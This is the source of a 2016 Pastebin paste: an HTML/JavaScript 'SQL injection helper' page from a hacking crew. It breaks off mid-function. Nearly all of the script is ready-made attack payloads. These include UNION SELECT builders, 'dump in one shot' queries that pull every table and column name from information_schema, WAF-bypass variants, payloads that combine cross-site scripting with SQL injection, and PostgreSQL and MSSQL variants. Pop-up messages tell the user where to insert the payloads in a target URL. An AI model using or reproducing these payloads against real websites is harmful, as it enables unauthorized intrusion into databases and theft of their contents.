r015

Source Tools Helper Sec7or Recode By ./R015

Jun 1st, 2016
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 39.44 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>N00bz Security Squad</title>
  4. <meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
  5. <meta content='index, follow' name='googlebot'/>
  6. <meta content='all' name='spiders'/>
  7. <meta content='all' name='WEBCRAWLERS'/>
  8. <meta content='Index, Follow' name='robots'/>
  9. <meta content='Versailles' name='author'/>
  10. <meta content='Sec7or Team' name='author'/>
  11.  
  12.  
  13. <style>
  14. body{
  15. background:url("http://i1237.photobucket.com/albums/ff474/cybertaziex/ground10.png") repeat;
  16. font-family: "Kelly Slab", cursive;
  17. background-color: #48D1CC;
  18. text-shadow:0px 0px 3px #48D1CC;
  19. }
  20. #content tr:hover{
  21. background-color: #48D1CC;
  22. }
  23. #content .first{
  24. background-color: #DC143C;
  25. }
  26. #content .first:hover{
  27. background-color: #48D1CC;
  28. text-shadow:0px 0px 1px #48D1CC;
  29. }
  30. table{
  31. border: 3px #DC143C solid;
  32. }
  33. H1{
  34. font-family: "Kelly Slab", cursive;
  35. }
  36. a{
  37. color: #DC143C;
  38. text-decoration: none;
  39. }
  40. a:hover{
  41. color: #48D1CC;
  42. text-shadow:0px 0px 10px #FF007F;
  43. }
  44. input,select,textarea{
  45. border: 3px #48D1CC solid;
  46. -moz-border-radius: 5px;
  47. -webkit-border-radius:5px;
  48. border-radius:5px;
  49. }
  50. </style>
  51.  
  52.  
  53.  
  54.  
  55.  
  56. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css"> <script src="http://code.jquery.com/jquery-2.1.3.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/js/bootstrap.min.js"></script>
  57.  
  58.  
  59.  
  60.  
  61. <script type="text/javascript">
  62.  
  63. // CheatSheet Dios Collection Pakage
  64. // By Versailles
  65. // FB : facebook.com/thever.sevenfoldism
  66. // Dont Change Copyright
  67.  
  68.  
  69. function rplc(){
  70.  
  71. function replaceAll(str, find, replace) { return str.replace(new RegExp(find, 'g'), replace); }
  72.  
  73. var str = document.getElementById('str').value;
  74. var wrd = document.getElementById('wrd').value;
  75. var rep = document.getElementById('rep').value;
  76.  
  77. hasil = replaceAll(str,wrd,rep);
  78. document.getElementById('hex').value = hasil;
  79.  
  80. }
  81.  
  82.  
  83. var encN=1;
  84. function decodeTxt(s){
  85. var s1=unescape(s.substr(0,s.length-1));
  86. var t='';
  87. for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
  88. return unescape(t);
  89. }
  90.  
  91. function encodeTxt(s){
  92. s=escape(s);
  93. var ta=new Array();
  94. for(i=0;i<s.length;i++)ta[i]=s.charCodeAt(i)+encN;
  95. return ""+escape(eval("String.fromCharCode("+ta+")"))+encN;
  96. }
  97.  
  98. function escapeTxt(os){
  99. var ns='';
  100. var t;
  101. var chr='';
  102. var cc='';
  103. var tn='';
  104. for(i=0;i<256;i++){
  105. tn=i.toString(16);
  106. if(tn.length<2)tn="0"+tn;
  107. cc+=tn;
  108. chr+=unescape('%'+tn);
  109. }
  110. cc=cc.toUpperCase();
  111. os.replace(String.fromCharCode(13)+'',"%13");
  112. for(q=0;q<os.length;q++){
  113. t=os.substr(q,1);
  114. for(i=0;i<chr.length;i++){
  115. if(t==chr.substr(i,1)){
  116. t=t.replace(chr.substr(i,1),"%"+cc.substr(i*2,2));
  117. i=chr.length;
  118. }}
  119. ns+=t;
  120. }
  121. return ns;
  122. }
  123. function unescapeTxt(s){
  124. return unescape(s);
  125. }
  126. function wF(s){
  127. document.write(decodeTxt(s));
  128. }
  129.  
  130. function esc(){
  131. var str = document.getElementById('str').value;
  132. hasil = escapeTxt(str);
  133. document.getElementById('hex').value = hasil;
  134. }
  135.  
  136.  
  137. function unesc(){
  138. var str = document.getElementById('str').value;
  139. hasil = unescapeTxt(str);
  140. document.getElementById('hex').value = hasil;
  141. }
  142.  
  143. var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  144. var base64DecodeChars = new Array(
  145. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  146. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
  147. -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63,
  148. 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1,
  149. -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14,
  150. 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1,
  151. -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
  152. 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
  153.  
  154. function base64encode(str) {
  155. var out, i, len;
  156. var c1, c2, c3;
  157.  
  158. len = str.length;
  159. i = 0;
  160. out = "";
  161. while(i < len) {
  162. c1 = str.charCodeAt(i++) & 0xff;
  163. if(i == len)
  164. {
  165. out += base64EncodeChars.charAt(c1 >> 2);
  166. out += base64EncodeChars.charAt((c1 & 0x3) << 4);
  167. out += "==";
  168. break;
  169. }
  170. c2 = str.charCodeAt(i++);
  171. if(i == len)
  172. {
  173. out += base64EncodeChars.charAt(c1 >> 2);
  174. out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
  175. out += base64EncodeChars.charAt((c2 & 0xF) << 2);
  176. out += "=";
  177. break;
  178. }
  179. c3 = str.charCodeAt(i++);
  180. out += base64EncodeChars.charAt(c1 >> 2);
  181. out += base64EncodeChars.charAt(((c1 & 0x3)<< 4) | ((c2 & 0xF0) >> 4));
  182. out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >>6));
  183. out += base64EncodeChars.charAt(c3 & 0x3F);
  184. }
  185. return out;
  186. }
  187.  
  188. function base64decode(str) {
  189. var c1, c2, c3, c4;
  190. var i, len, out;
  191.  
  192. len = str.length;
  193. i = 0;
  194. out = "";
  195. while(i < len) {
  196. /* c1 */
  197. do {
  198. c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
  199. } while(i < len && c1 == -1);
  200. if(c1 == -1)
  201. break;
  202.  
  203. /* c2 */
  204. do {
  205. c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
  206. } while(i < len && c2 == -1);
  207. if(c2 == -1)
  208. break;
  209.  
  210. out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
  211.  
  212. /* c3 */
  213. do {
  214. c3 = str.charCodeAt(i++) & 0xff;
  215. if(c3 == 61)
  216. return out;
  217. c3 = base64DecodeChars[c3];
  218. } while(i < len && c3 == -1);
  219. if(c3 == -1)
  220. break;
  221.  
  222. out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
  223.  
  224. /* c4 */
  225. do {
  226. c4 = str.charCodeAt(i++) & 0xff;
  227. if(c4 == 61)
  228. return out;
  229. c4 = base64DecodeChars[c4];
  230. } while(i < len && c4 == -1);
  231. if(c4 == -1)
  232. break;
  233. out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
  234. }
  235. return out;
  236. }
  237.  
  238. function utf16to8(str) {
  239. var out, i, len, c;
  240.  
  241. out = "";
  242. len = str.length;
  243. for(i = 0; i < len; i++) {
  244. c = str.charCodeAt(i);
  245. if ((c >= 0x0001) && (c <= 0x007F)) {
  246. out += str.charAt(i);
  247. } else if (c > 0x07FF) {
  248. out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
  249. out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
  250. out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
  251. } else {
  252. out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
  253. out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
  254. }
  255. }
  256. return out;
  257. }
  258.  
  259. function utf8to16(str) {
  260. var out, i, len, c;
  261. var char2, char3;
  262.  
  263. out = "";
  264. len = str.length;
  265. i = 0;
  266. while(i < len) {
  267. c = str.charCodeAt(i++);
  268. switch(c >> 4)
  269. {
  270. case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
  271. // 0xxxxxxx
  272. out += str.charAt(i-1);
  273. break;
  274. case 12: case 13:
  275. // 110x xxxx 10xx xxxx
  276. char2 = str.charCodeAt(i++);
  277. out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
  278. break;
  279. case 14:
  280. // 1110 xxxx 10xx xxxx 10xx xxxx
  281. char2 = str.charCodeAt(i++);
  282. char3 = str.charCodeAt(i++);
  283. out += String.fromCharCode(((c & 0x0F) << 12) |
  284. ((char2 & 0x3F) << 6) |
  285. ((char3 & 0x3F) << 0));
  286. break;
  287. }
  288. }
  289.  
  290. return out;
  291. }
  292.  
  293. function CharToHex(str) {
  294. var out, i, len, c, h;
  295.  
  296. out = "";
  297. len = str.length;
  298. i = 0;
  299. while(i < len)
  300. {
  301. c = str.charCodeAt(i++);
  302. h = c.toString(16);
  303. if(h.length < 2)
  304. h = "0" + h;
  305.  
  306. out += "\\x" + h + " ";
  307. if(i > 0 && i % 8 == 0)
  308. out += "\r\n";
  309. }
  310.  
  311. return out;
  312. }
  313.  
  314. function b64_enc() {
  315. var str = document.getElementById('str').value;
  316. document.getElementById('hex').value = base64encode(utf16to8(str));
  317. }
  318.  
  319. function b64_dec() {
  320. var str = document.getElementById('str').value;
  321. var opts = "checked";
  322.  
  323. if(opts.checked)
  324. {
  325. document.getElementById('hex').value = CharToHex(base64decode(str));
  326. }
  327. else
  328. {
  329. document.getElementById('hex').value = utf8to16(base64decode(str));
  330. }
  331. }
  332.  
  333.  
  334.  
  335. function d2h(d) {return d.toString(16);}
  336. function Str2Hex() {
  337. var tmp = document.getElementById('str').value;
  338. var str = '';
  339. for (var i=0; i<tmp.length; i++) {
  340. c = tmp.charCodeAt(i);
  341. str += d2h(c) + ''; }
  342. document.getElementById('hex').value = str; }
  343.  
  344. function h2d(h) {
  345. return parseInt( h, 16 ); }
  346. function Hex2Str(){
  347. var string = document.getElementById('str').value;
  348. var string = string.toLowerCase();
  349. string = string.replace( /%/g, '' );
  350. string = string.replace( /[^0-9abcdefg]/g, '' );
  351.  
  352. var charStringArray = new Array();
  353. var buffer = '';
  354. var hasil = '';
  355. for ( var c = 0 ; c < string.length ; c++ ) {
  356. buffer += string.charAt( c ).toString();
  357. if ( buffer.length >= 2 ) {
  358. hasil += String.fromCharCode( h2d( buffer ) );
  359. buffer = '';
  360. }
  361. }
  362. document.getElementById('hex').value = hasil;
  363. }
  364.  
  365.  
  366.  
  367. function kolom() {
  368.  
  369. var columns = prompt( "Total Columns ?", "48" );
  370. columns = Math.min(1000, parseInt( columns ));
  371. var colArray = new Array();
  372. for ( var i = 0 ; i < columns ; i++ ) {
  373. colArray.push( i+1 );
  374. }
  375. var kolom = "+UNION+SELECT+" + colArray.join( ',' ); document.getElementById('dios').value = kolom;
  376. }
  377.  
  378. function dios1(){
  379. var dios1 = '(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)';
  380. document.getElementById('dios').value = dios1;
  381. }
  382.  
  383. function dios2(){
  384. var dios2 = '(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))';
  385. document.getElementById('dios').value = dios2;
  386. }
  387.  
  388. function dios3(){
  389. var dios3 = 'make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)';
  390. document.getElementById('dios').value = dios3;
  391. }
  392.  
  393. function dios4(){
  394. var dios4 = "export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2)";
  395. document.getElementById('dios').value = dios4;
  396. }
  397.  
  398.  
  399. function xssdios(){
  400. var xssdios = 'concat(0x3c2f6469763e3c7363726970743e616c6572742827,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x5c6e,table_name,0x203a3a20,column_name))))x),0x27293c2f7363726970743e)';
  401. document.getElementById('dios').value = xssdios;
  402. }
  403.  
  404.  
  405. function makman(){
  406. var makman = alert("SQLIGODS SYNTAX V 1.0 \n\nBY MAKMAN");
  407. var makman = "concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)";
  408. document.getElementById('dios').value = makman;
  409. }
  410.  
  411. function trjn(){
  412. var trjn = 'concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e,if((@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,2,0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/';
  413. document.getElementById('dios').value = trjn;
  414. }
  415.  
  416. function trjnx(){
  417. var trjnx = "concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)";
  418. document.getElementById('dios').value = trjnx;
  419. }
  420.  
  421. function bypsfrm(){
  422. var bypsfrm = alert("Put after parameter id , and Replace Vuln Column With @sec7or");
  423. var bypsfrm = '+and@sec7or:=concat(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x203a3a20,column_name)),@)+/*!50000UNION*/+SELECT+';
  424. document.getElementById('dios').value = bypsfrm;
  425. }
  426.  
  427. function ebf(){
  428. var ebf = "(SELECT!x-~0.FROM(SELECT(concat_ws(0x3a3a,user(),@@version,database(),concat(@:=0,(Select+count(*)from+information_schema.tables+where+table_schema=database()and@:=concat(@,0x0b,table_name)),@)))x)a)";
  429. document.getElementById('dios').value = ebf;
  430. }
  431.  
  432. function poligon(){
  433. var poligon = "polygon((Select*from((SELECT(!x-~0)FROM(SELECT(concat_ws(0x203a3a20,user(),@@version,database(),(Select+group_concat(table_name+separator+0x0b)from+information_schema.tables+where+table_schema=database())))x)a)b)))";
  434. document.getElementById('dios').value = poligon;
  435. }
  436.  
  437. function multipoint(){
  438. var multipoint = alert("It is only for mysql < 5.5 \n\nHow To Use\n\n1.remove parameter id and change it with the query \nif there s still any table that doesnt show completely just increase the limit ,number 20 in limit 1,20 is our assumption how many tables there in the site..\n\nM@db100d");
  439. var multipoint = "multipoint((select*from(select!x-~0.from(select(select+group_concat(table_name+separator+0x0b)from(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+1,20)c)x)j)h))";
  440. document.getElementById('dios').value = multipoint;
  441. }
  442.  
  443. function postgre(){
  444. var postgre = "(select+string_agg(concat(table_name,'::',column_name),$$<li>$$)from+information_schema.columns+where+table_schema+not+in($$information_schema$$,$$pg_catalog$$))";
  445. document.getElementById('dios').value = postgre;
  446. }
  447.  
  448. function mssql(){
  449. var mssql = "(select+concat(' ',table_name,'::',column_name)from+information_schema.columns+for+xml+path(''))";
  450. document.getElementById('dios').value = mssql;
  451. }
  452.  
  453. function bof(){
  454. var bof = "+and(SELECT+1)=(SELECT+0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)/*!50000UNION*/SELECT+";
  455. document.getElementById('dios').value = bof;
  456.  
  457. }
  458.  
  459.  
  460. function version1(){
  461. var v1 = 'version()';
  462. document.getElementById('dios').value = v1;
  463. }
  464.  
  465. function version2(){
  466. var v2 = '@@version';
  467. document.getElementById('dios').value = v2;
  468. }
  469.  
  470. function version3(){
  471. var v3 = '@@GLOBAL.VERSION';
  472. document.getElementById('dios').value = v3;
  473. }
  474.  
  475. function version4(){
  476. var v4 = "(select+variable_value+from+information_schema.session_variables+where+variable_name+like+0x56455253494f4e)";
  477. document.getElementById('dios').value = v4;
  478. }
  479.  
  480. function version5(){
  481. var v5 = "(Select+variable_value+from+information_schema.global_variables+where+variable_name=0x76657273696f6e)";
  482. document.getElementById('dios').value = v5;
  483. }
  484.  
  485. function user1(){
  486. var u1 = 'user()';
  487. document.getElementById('dios').value = u1;
  488. }
  489.  
  490. function user2(){
  491. var u2 = 'CURRENT_USER()';
  492. document.getElementById('dios').value = u2;
  493. }
  494.  
  495. function user3(){
  496. var u3 = 'SYSTEM_USER()';
  497. document.getElementById('dios').value = u3;
  498. }
  499.  
  500. function user4(){
  501. var u4 = 'SESSION_USER()';
  502. document.getElementById('dios').value = u4;
  503. }
  504.  
  505. function user5(){
  506. var u5 = 'SUBSTRING_INDEX(USER(),0x40,1)';
  507. document.getElementById('dios').value = u5;
  508. }
  509.  
  510. function user6(){
  511. var u6 = '(SELECT+CONCAT(USER)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
  512. document.getElementById('dios').value = u6;
  513. }
  514.  
  515. function db1(){
  516. var d1 = 'DATABASE()';
  517. document.getElementById('dios').value = d1;
  518. }
  519.  
  520. function db2(){
  521. var d2 = 'SCHEMA()';
  522. document.getElementById('dios').value = d2;
  523. }
  524.  
  525. function db3(){
  526. var d3 = '(SELECT+CONCAT(DB)+FROM+INFORMATION_SCHEMA.PROCESSLIST)';
  527. document.getElementById('dios').value = d3;
  528. }
  529.  
  530. function o1(){
  531. var o1 = '@@HOSTNAME';
  532. document.getElementById('dios').value = o1;
  533. }
  534.  
  535. function o2(){
  536. var o2 = '@@VERSION_COMPILE_MACHINE';
  537. document.getElementById('dios').value = o2;
  538. }
  539.  
  540. function o3(){
  541. var o3 = '@@VERSION_COMPILE_OS';
  542. document.getElementById('dios').value = o3;
  543. }
  544.  
  545. function o4(){
  546. var o4 = '@@BASEDIR';
  547. document.getElementById('dios').value = o4;
  548. }
  549.  
  550. function o5(){
  551. var o5 = '@@HAVE_OPENSSL';
  552. document.getElementById('dios').value = o5;
  553. }
  554.  
  555. function o6(){
  556. var o6 = '@@HAVE_SYMLINK';
  557. document.getElementById('dios').value = o6;
  558. }
  559.  
  560. function o7(){
  561. var o7 = '@@PORT';
  562. document.getElementById('dios').value = o7;
  563. }
  564.  
  565. function o8(){
  566. var o8 = '@@SOCKET';
  567. document.getElementById('dios').value = o8;
  568. }
  569.  
  570. function xssqli(){
  571. var xssqli = prompt('Input Your Query','VERSION()');
  572. var xssqli = "concat(0x3c2f6469763e3c7363726970743e616c6572742827,"+xssqli+",0x27293c2f7363726970743e)";
  573. document.getElementById('dios').value = xssqli;
  574. }
  575.  
  576. function mydios(){
